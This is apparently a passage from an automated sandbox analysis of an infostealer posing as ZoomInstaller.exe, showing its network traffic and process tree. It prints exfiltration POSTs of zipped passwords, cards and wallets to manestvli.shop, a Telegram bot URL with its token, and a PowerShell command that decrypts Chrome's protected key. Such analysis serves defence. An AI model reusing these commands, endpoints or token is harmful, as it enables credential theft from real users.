Oct 29, 2024 14:03:30.550745964 CET | 1.1.1.1 | 192.168.2.4 | 0xe34c | No error (0) | manestvli.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:03:30.550745964 CET | 1.1.1.1 | 192.168.2.4 | 0xe34c | No error (0) | manestvli.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 14:03:32.079205036 CET | 1.1.1.1 | 192.168.2.4 | 0x2106 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• api.myip.com
• manestvli.shop
• api.telegram.org
                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   0 | 192.168.2.4 | 49730 | 104.26.9.59 | 443 | 7284 | C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   2024-10-29 13:03:06 UTC | 93 | OUT | GET / HTTP/1.1
                                                                                  Host: api.myip.com
                                                                                  User-Agent: Go-http-client/1.1
                                                                                  Accept-Encoding: gzip
                                                                                   2024-10-29 13:03:06 UTC | 567 | IN | HTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 13:03:06 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BkqWOmpgyXSbAY8yVnQngtazxdgRJzw1FTgCnCtTEFf0MDLEVK1GFskZav%2BDvm1mUsRfgebqvJ37WMlb%2FawNwomL21fssHhzL3Cb84Gc3SGzr1iaWF3fzOINc%2F0HZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da35d221de0a924-DFW
                                                                                   2024-10-29 13:03:06 UTC | 65 | IN | Data Raw: 33 62 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 63 22 3a 22 55 53 22 7d 0d 0a
                                                                                  Data Ascii: 3b{"ip":"173.254.250.72","country":"United States","cc":"US"}
                                                                                   2024-10-29 13:03:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   1 | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | 7284 | C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   2024-10-29 13:03:31 UTC | 810 | OUT | POST /upload.php?data=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&hash=2d6441c1bfc749b0344f HTTP/1.1
                                                                                  Host: manestvli.shop
                                                                                  User-Agent: Go-http-client/1.1
                                                                                  Content-Length: 6347
                                                                                  Content-Type: multipart/form-data; boundary=c4f7aaa42ff4a8b0a52c6b01c13381cfc6993937b438de4a4efa6525794a
                                                                                  Accept-Encoding: gzip
                                                                                   2024-10-29 13:03:31 UTC | 376 | OUT | Data Raw: 2d 2d 63 34 66 37 61 61 61 34 32 66 66 34 61 38 62 30 61 35 32 63 36 62 30 31 63 31 33 33 38 31 63 66 63 36 39 39 33 39 33 37 62 34 33 38 64 65 34 61 34 65 66 61 36 35 32 35 37 39 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 41 69 6c 75 72 6f 70 68 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 2f 50 4b 03 04 14 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 00 00 41 69 6c 75
                                                                                  Data Ascii: --c4f7aaa42ff4a8b0a52c6b01c13381cfc6993937b438de4a4efa6525794aContent-Disposition: form-data; name="file"; filename="Ailurophile.zip"Content-Type: application/octet-streamPKAilurophile/PKAilu
                                                                                   2024-10-29 13:03:31 UTC | 2372 | OUT | Data Raw: c5 e5 97 af 90 58 5a 92 9f 96 99 93 53 ac 90 96 5f 9a 97 a2 90 96 5f a4 e0 9e 9f 9f 9e 93 aa e0 92 9a 96 58 9a 53 c2 05 08 00 00 ff ff 50 4b 07 08 47 88 f4 14 53 00 00 00 56 00 00 00 50 4b 03 04 14 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 43 61 72 64 73 2f 50 4b 03 04 14 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 43 61 72 64 73 5c 43 61 72 64 73 2e 74 78 74 72 cc cc 29 2d ca 2f c8 c8 cc 49 55 08 2e 49 4d cc 49 2d 52 d0 55 08 49 cd 49 4d 2f 4a cc b5 52 70 40 52 50 96 c7 c5 e5 97 af 90 9c 58 94 52 ac 90 96 5f 9a 97 02 08 00 00 ff ff 50 4b 07 08 9d 40 e3 60 3b 00 00 00 3e 00 00 00 50 4b 03 04 14 00 00 08 00 00 00 00 00 00
                                                                                  Data Ascii: XZS__XSPKGSVPKAilurophile\Cards/PKAilurophile\Cards\Cards.txtr)-/IU.IMI-RUIIM/JRp@RPXR_PK@`;>PK
                                                                                   2024-10-29 13:03:31 UTC | 538 | OUT | Data Raw: 1c ad 3f 29 f1 17 e5 51 43 81 3c a0 04 a3 22 2d 30 65 a2 3c 68 a0 a3 86 42 94 df 34 d0 41 43 df 1c 34 dc 8c 2a 3f 66 ba 19 ec 69 21 ca 7c b4 d7 a5 87 4e 14 68 2a 9c 42 78 a2 c0 03 05 fe bb fa d8 5f d7 f7 cb 6e b1 55 5d 73 57 e6 9c 05 73 1e 85 67 a2 bb ce 3a a1 35 b8 3d c1 a6 ab b5 b2 7b d8 8a ae 1e 45 4d 70 2f 64 03 95 19 20 e4 58 28 77 46 7e 92 f2 52 91 44 10 c4 59 1c 65 61 fa 27 94 17 5a 48 1a 15 82 53 50 e0 3c 4c 08 23 91 72 4c 92 78 81 5c 16 b1 90 ac 4c 88 2d ae 84 fe c2 17 f9 1d 0b b7 4f 54 fb 15 da 71 a6 57 d2 57 13 18 ba 3d 21 4d 60 a8 4f 60 d8 0b d9 60 65 06 9c c0 ce 0d e6 9a 85 7e f8 1a 00 00 ff ff 50 4b 07 08 43 74 a4 df ea 01 00 00 b2 08 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 00 00 00 41 69 6c 75
                                                                                  Data Ascii: ?)QC<"-0e<hB4AC4*?fi!|Nh*Bx_nU]sWsg:5={EMp/d X(wF~RDYea'ZHSP<L#rLx\L-OTqWW=!M`O``e~PKCtPK)Ailu
                                                                                   2024-10-29 13:03:31 UTC | 3061 | OUT | Data Raw: 5c 5c 9e 5f 94 a2 90 96 5f 9a 97 02 08 00 00 ff ff 50 4b 07 08 56 91 d4 6f 3e 00 00 00 41 00 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2b 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 50 61 73 73 77 6f 72 64 73 5c 4d 69 63 72 6f 73 6f 66 74 2d 44 65 66 61 75 6c 74 2e 74 78 74 72 cc cc 29 2d ca 2f c8 c8 cc 49 55 08 2e 49 4d cc 49 2d 52 d0 55 08 49 cd 49 4d 2f 4a cc b5 52 70 40 52 50 96 c7 c5 e5 97 af 50 90 58 5c 5c 9e 5f 94 a2 90 96 5f 9a 97 02 08 00 00 ff ff 50 4b 07 08 56 91 d4 6f 3e 00 00 00 41 00 00 00 50 4b 03 04 14 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 57 61 6c 6c 65 74 73 2f 50 4b 03 04 14 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: \\__PKVo>APK+Ailurophile\Passwords\Microsoft-Default.txtr)-/IU.IMI-RUIIM/JRp@RPPX\\__PKVo>APKAilurophile\Wallets/PK
                                                                                   2024-10-29 13:03:32 UTC | 796 | IN | HTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 13:03:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/8.0.30
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ul67Zn%2B%2ButD1SfyYfgIsrmtjPYBdSTVLAbuvDkwQFbblHfQeI%2FJfBrmCIqLVQ9U5zXUO3zc5adgh%2BqGIP4rVvzDGRjHVQFPfOw4audj5TLAAoPTaWi8l1HXr%2BCePexBe5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da35dbdb8152c8f-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1332&sent=9&recv=12&lost=0&retrans=0&sent_bytes=2834&recv_bytes=7860&delivery_rate=2035137&cwnd=251&unsent_bytes=0&cid=13be810c7047f43a&ts=866&x=0"
                                                                                   2024-10-29 13:03:32 UTC | 743 | IN | Data Raw: 32 65 30 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 5f 70 75 74 5f 63 6f 6e 74 65 6e 74 73 28 68 65 72 61 73 76 6e 78 61 69 6c 75 72 6f 70 68 69 6c 65 2f 41 69 6c 75 72 6f 70 68 69 6c 65 5f 36 37 32 30 64 64 32 33 64 39 66 34 66 33 2e 35 31 36 31 33 31 38 30 2e 7a 69 70 2f 6c 6f 67 2e 74 78 74 29 3a 20 46 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 75 70 6c 6f 61 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 32 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65
                                                                                  Data Ascii: 2e0<br /><b>Warning</b>: file_put_contents(herasvnxailurophile/Ailurophile_6720dd23d9f4f3.51613180.zip/log.txt): Failed to open stream: No such file or directory in <b>C:\xampp\htdocs\upload.php</b> on line <b>42</b><br /><br /><b>Warning</b>: file
                                                                                   2024-10-29 13:03:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                   2 | 192.168.2.4 | 49738 | 149.154.167.220 | 443 | 7284 | C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                   2024-10-29 13:03:33 UTC | 230 | OUT | POST /bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage HTTP/1.1
                                                                                  Host: api.telegram.org
                                                                                  User-Agent: Go-http-client/1.1
                                                                                  Content-Length: 1727
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Accept-Encoding: gzip
                                                                                   2024-10-29 13:03:33 UTC | 956 | OUT | Data Raw: 63 68 61 74 5f 69 64 3d 36 38 34 33 32 31 32 35 31 34 26 70 61 72 73 65 5f 6d 6f 64 65 3d 48 54 4d 4c 26 74 65 78 74 3d 25 30 41 25 46 30 25 39 46 25 38 43 25 39 30 2b 25 33 43 62 25 33 45 49 50 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 25 30 41 25 46 30 25 39 46 25 38 46 25 42 33 2b 25 33 43 62 25 33 45 43 6f 75 6e 74 72 79 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 55 6e 69 74 65 64 2b 53 74 61 74 65 73 25 30 41 25 46 30 25 39 46 25 39 32 25 42 42 2b 25 33 43 62 25 33 45 48 6f 73 74 6e 61 6d 65 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 32 31 36 35 35 34 25 30 41 25 46 30 25 39 46 25 39 36 25 41 35 2b 25 33 43 62 25 33 45 50 43 2b 54 79 70 65 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 4d 69 63 72 6f 73 6f 66 74 2b
                                                                                  Data Ascii: chat_id=6843212514&parse_mode=HTML&text=%0A%F0%9F%8C%90+%3Cb%3EIP%3A%3C%2Fb%3E+173.254.250.72%0A%F0%9F%8F%B3+%3Cb%3ECountry%3A%3C%2Fb%3E+United+States%0A%F0%9F%92%BB+%3Cb%3EHostname%3A%3C%2Fb%3E+216554%0A%F0%9F%96%A5+%3Cb%3EPC+Type%3A%3C%2Fb%3E+Microsoft+
                                                                                   2024-10-29 13:03:33 UTC | 771 | OUT | Data Raw: 70 74 65 2b 74 6f 6b 65 6e 2b 62 61 63 6b 75 70 2b 73 65 63 72 65 74 2b 73 65 65 64 2b 6d 6e 65 6d 6f 6e 69 63 2b 6d 65 6d 6f 72 69 63 2b 70 72 69 76 61 74 65 2b 6b 65 79 2b 70 61 73 73 70 68 72 61 73 65 2b 70 61 73 73 2b 70 68 72 61 73 65 2b 73 74 65 61 6c 2b 62 61 6e 6b 2b 69 6e 66 6f 2b 63 61 73 69 6e 6f 2b 70 72 76 2b 70 72 69 76 25 43 33 25 41 39 2b 70 72 69 76 65 2b 74 65 6c 65 67 72 61 6d 2b 69 64 65 6e 74 69 66 69 61 6e 74 2b 69 64 65 6e 74 69 66 69 61 6e 74 73 2b 70 65 72 73 6f 6e 6e 65 6c 2b 74 72 61 64 69 6e 67 2b 62 69 74 63 6f 69 6e 2b 73 61 75 76 65 67 61 72 64 65 2b 66 75 6e 64 73 2b 72 65 63 75 70 2b 6e 6f 74 65 25 35 44 25 30 41 25 30 41 25 46 30 25 39 46 25 39 34 25 38 44 2b 25 33 43 62 25 33 45 46 6f 75 6e 64 2b 31 2b 61 75 74 6f 66 69
                                                                                  Data Ascii: pte+token+backup+secret+seed+mnemonic+memoric+private+key+passphrase+pass+phrase+steal+bank+info+casino+prv+priv%C3%A9+prive+telegram+identifiant+identifiants+personnel+trading+bitcoin+sauvegarde+funds+recup+note%5D%0A%0A%F0%9F%94%8D+%3Cb%3EFound+1+autofi
                                                                                   2024-10-29 13:03:33 UTC | 389 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx/1.18.0
                                                                                  Date: Tue, 29 Oct 2024 13:03:33 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 2325
                                                                                  Connection: close
                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                   2024-10-29 13:03:33 UTC | 2325 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 37 36 32 38 32 32 35 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 63 68 61 74 62 6f 74 33 35 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 66 72 77 65 67 77 65 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 34 33 32 31 32 35 31 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 78 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 61 6c 5f 78 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 32 30 37 30 31 33 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 63 5c 75 64 66 31 30 20 49 50 3a 20 31 37 33 2e 32
                                                                                  Data Ascii: {"ok":true,"result":{"message_id":76,"from":{"id":7576282251,"is_bot":true,"first_name":"chatbot355","username":"frwegwebot"},"chat":{"id":6843212514,"first_name":"x1","username":"real_x1","type":"private"},"date":1730207013,"text":"\ud83c\udf10 IP: 173.2



                                                                                  Target ID:0
                                                                                  Start time:09:03:04
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\Desktop\ZoomInstaller.exe"
                                                                                  Imagebase:0x7ff6841c0000
                                                                                  File size:22'207'488 bytes
                                                                                  MD5 hash:806A6CCCE380785FAA45512CE603C580
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:09:03:06
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:wmic path win32_videocontroller get caption
                                                                                  Imagebase:0x7ff7d45f0000
                                                                                  File size:576'000 bytes
                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:09:03:06
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:09:03:07
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:tasklist
                                                                                  Imagebase:0x7ff60ccd0000
                                                                                  File size:106'496 bytes
                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:09:03:07
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:09:03:08
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:wmic os get Caption
                                                                                  Imagebase:0x7ff7d45f0000
                                                                                  File size:576'000 bytes
                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:09:03:08
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:09:03:08
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:wmic os get Version
                                                                                  Imagebase:0x7ff7d45f0000
                                                                                  File size:576'000 bytes
                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:09:03:08
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x520000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:09:03:10
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:10
                                                                                  Start time:09:03:10
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:11
                                                                                  Start time:09:03:12
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:12
                                                                                  Start time:09:03:12
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:13
                                                                                  Start time:09:03:13
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:tasklist
                                                                                  Imagebase:0x7ff60ccd0000
                                                                                  File size:106'496 bytes
                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:14
                                                                                  Start time:09:03:13
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:15
                                                                                  Start time:09:03:15
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:16
                                                                                  Start time:09:03:15
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:17
                                                                                  Start time:09:03:19
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
